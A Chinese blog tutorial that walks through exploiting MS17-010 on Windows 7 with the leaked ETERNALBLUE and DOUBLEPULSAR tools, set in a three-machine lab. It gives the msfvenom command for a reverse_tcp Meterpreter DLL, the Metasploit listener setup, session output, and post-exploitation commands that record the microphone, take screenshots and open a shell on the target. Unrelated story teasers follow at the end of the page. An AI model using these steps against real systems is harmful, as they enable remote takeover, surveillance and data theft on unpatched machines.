ETERNALBLUE工具测试与MS17-010漏洞利用


最近一段时间网络又发生了一次大地震,Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,可以覆盖大量的 Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用。

目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

而Shadow Brokers也在推特上面放出了保留部分文件,下载地址:shadowbroker

这次的文件有三个目录,分别为“Windows”、“Swift” 和 “OddJob”,包含一堆令人震撼的黑客工具。本文要写的就是利用ETERNALBLUE工具进行攻击。

0x01 环境准备

准备三台机器:两台攻击机器windows 7和kali,一台目标机器windows 7
首先在攻击机器windows7中安装配置python和pywin32。

  1. python-2.6 32位 :python-2.6.6_x_32.msi 安装完成后并配置环境变量;
  2. pywin32 :pywin32-221.win-amd64-py2.6.exe
  3. 因为0day工具包里面代码的原因,需要在windows目录下新建一个listeningposts目录(不是c盘根目录的windows),空的就好,不需要再去注释文件。
    环境搭建好后,运行windows目录下的fb.py脚本,正常显示即可。

0x02 漏洞利用

  1. 在kali下配置msf的payload:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.30 LPORT=6666 -f dll > /opt/test.dll  
##LHOST为kali机器IP,命令生成dll文件保存在/opt路径下
  1. 把上面生成的dll文件放在windows攻击机器的C盘根目录下,
  2. 在kali中开启msfpaylod监听
$ msfconsole
msf > use exploit/multi/handler 
msf exploit(handler) >set lhost 192.168.0.30
msf exploit(handler) >set lport 6666
msf exploit(handler) >set PAYLOAD windows/x64/meterpreter/reverse_tcp 
msf exploit(handler) > exploit 
[*] Started reverse handler on 172.16.0.30:6666 
[*] Starting the payload handler...
  1. 在windows攻击机器上运行fb.py脚本


  2. 设置目标机器IP


  3. 创建一个新项目(如果是第一次运行是没有下图中的test项目的)


  4. 利用eternalblue漏洞


  5. Eternalblue配置(需要注意的几个配置如下图,其它一路回车)


  6. Eternalblue漏洞利用成功


  7. 利用Doublepulsar漏洞


  8. 配置Doublepulsar(除了下图中需要修改的地方,其它一路回车)



  9. 攻击成功
    当执行成功后,在kali机器界面就成功连接了目标机器,我们就可以在目标机器上查看文件,截图等等。按ctrl+z即可退出连接。
[*] Started reverse handler on 192.168.0.30:6666 
[*] Starting the payload handler... 
[*] Sending stage (1105970 bytes) to 192.168.0.40
[*] Meterpreter session 2 opened (192.168.0.30:6666->192.168.0.40:52187) at 2017-04-28 07:35:45 +0000 
meterpreter >
  1. 桌面截图
meterpreter > webcam_list    ##启动webcam录屏工具
: Citrix HDX Web Camera
meterpreter > record_mic    ##录制屏幕
[*] Starting... 
[*] Stopped
Audio saved to: /usr/bin/tmshuzXf.wav    ##保存路径 
meterpreter > screenshot    ##截图
Screenshot saved to: /usr/bin/FgNesEUj.jpeg  ##保存路径 
meterpreter >
  1. 进入机器查看文件
meterpreter >shell  ##输入shell命令就可以进去目标机器了
Process 924 created. 
Channel 1 created.
Microsoft Windows 7 
C:\Windows\system32>cd c:\
cd c:\
c:\>

博客地址:http://yangfannie.com

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 157,298评论 4 360
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 66,701评论 1 290
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 107,078评论 0 237
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,687评论 0 202
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,018评论 3 286
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,410评论 1 211
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,729评论 2 310
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,412评论 0 194
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,124评论 1 239
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,379评论 2 242
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,903评论 1 257
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,268评论 2 251
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,894评论 3 233
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,014评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,770评论 0 192
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,435评论 2 269
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,312评论 2 260

推荐阅读更多精彩内容